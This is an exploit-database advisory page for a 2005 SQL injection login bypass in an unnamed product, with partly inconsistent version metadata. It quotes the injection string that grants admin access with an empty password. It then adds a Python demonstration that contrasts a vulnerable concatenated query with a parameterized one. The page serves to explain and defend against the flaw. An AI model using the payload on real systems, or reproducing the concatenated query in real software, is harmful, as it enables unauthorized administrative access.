vendor:
by: str0ke
CVSS: 7.5 (HIGH)
CWE: Login Bypass
Product Name:
Affected Version From: 1.2.2005
Affected Version To: 1.2.2005
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2005

Login Bypass vulnerability in version 1.2.5

An attacker can bypass the login process and gain administrative access by submitting a specially crafted login string: the string injects SQL into the authentication query, and the password field is left empty. The exploit was tested on version 1.2.5.

Mitigation:

Update to a patched version of the software or implement proper input validation and access controls.
Source

Exploit-DB raw data:

# Tested with version 1.2.5 /str0ke

Login as admin without pass:

Login: "' OR 'a'='a' AND admin='Y'/*" (without quotes)
Password: (empty)

# milw0rm.com [2005-03-21]
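
Why the login string above defeats a concatenated authentication query, and how bound parameters stop it, shown as an added example that is not code from the affected product or from the original advisory. Python with SQLite stands in for the product's unknown stack; the `users` table and the `login` and `password` column names are assumptions, while the `admin` column with value `'Y'` is taken from the login string itself.

```python
import sqlite3

# Login string quoted in the raw data on this page; the password is left empty.
PAGE_LOGIN = "' OR 'a'='a' AND admin='Y'/*"


def make_db():
    # Constructed sample data. Table name and the login/password columns are
    # assumptions; only the admin column is implied by the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT, password TEXT, admin TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("root", "hash-1", "Y"), ("alice", "hash-2", "N")],
    )
    return db


def build_concatenated(login, password):
    # Vulnerable pattern: user input is pasted into the SQL text, so quotes
    # and comment markers in the input become part of the statement.
    return ("SELECT login, admin FROM users WHERE login='" + login +
            "' AND password='" + password + "'")


def login_concatenated(db, login, password):
    return db.execute(build_concatenated(login, password)).fetchone()


def login_parameterized(db, login, password):
    # Hardened pattern: input is bound as data and is never parsed as SQL.
    return db.execute(
        "SELECT login, admin FROM users WHERE login = ? AND password = ?",
        (login, password),
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    # The password comparison ends up inside the unterminated /* comment.
    print(build_concatenated(PAGE_LOGIN, ""))
    print("concatenated :", login_concatenated(db, PAGE_LOGIN, ""))
    print("parameterized:", login_parameterized(db, PAGE_LOGIN, ""))
```

In the concatenated form the `WHERE` clause reduces to `login='' OR ('a'='a' AND admin='Y')`, which selects the administrator row without any password check; in the parameterized form the same string is only compared against stored login names.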